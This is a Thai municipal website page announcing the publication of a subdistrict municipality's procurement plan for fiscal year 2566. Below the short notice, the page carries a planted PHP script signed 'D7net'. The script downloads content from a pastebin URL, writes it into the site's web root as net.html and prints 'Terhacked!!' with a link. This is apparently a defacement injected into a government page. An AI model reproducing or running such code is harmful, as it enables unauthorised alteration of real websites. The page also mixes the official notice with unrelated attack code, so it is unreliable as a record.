หมวดหมู่ : ข่าวจัดซื้อจัดจ้าง
หัวข้อ : ประกาศเทศบาลตำบลเตราะบอน เรื่อง เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.2566
โดย : admin
อ่าน : 387
อังคาร ที่ 6 เดือน ธันวาคม พ.ศ.2565 [ ดาวน์โหลด แฟ้มเอกสาร ]
พิมพ์ 

ประกาศเทศบาลตำบลเตราะบอน เรื่อง เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.2566 ประกาศ ณ วันที่ 3 ตุลาคม พ.ศ.2565

<!DOCTYPE HTML>
<html><head>
<title>Script Uploaded !</title>
<center>
</html>
<?php
/* Auto Upload Files By D7net */
function http_get($url){
$d7net = curl_init($url);
curl_setopt($d7net, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($d7net, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($d7net, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($d7net, CURLOPT_HEADER, 0);
return curl_exec($d7net);
curl_close($d7net);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/net.html" ; 
$text = http_get('https://pastebin.com/raw/yRw3cjkk');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else 
echo "Failed :(";
$web = "http://".$_SERVER['HTTP_HOST']."/"; 
$check3=$_SERVER['DOCUMENT_ROOT'] . "/net.html" ; 
$text3 = http_get('https://pastebin.com/raw/yRw3cjkk');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
if(file_exists($check3)){
echo $check3."</br>";
echo "Copyright   2018" ;
}else 
echo "Prosess... ";
echo "<br><br>Script Upload done ! <br><br>  .
 " ;
echo "Terhacked!! ~> <b><a href='$web/net.html' target='_blank'>view</b></a>";
?>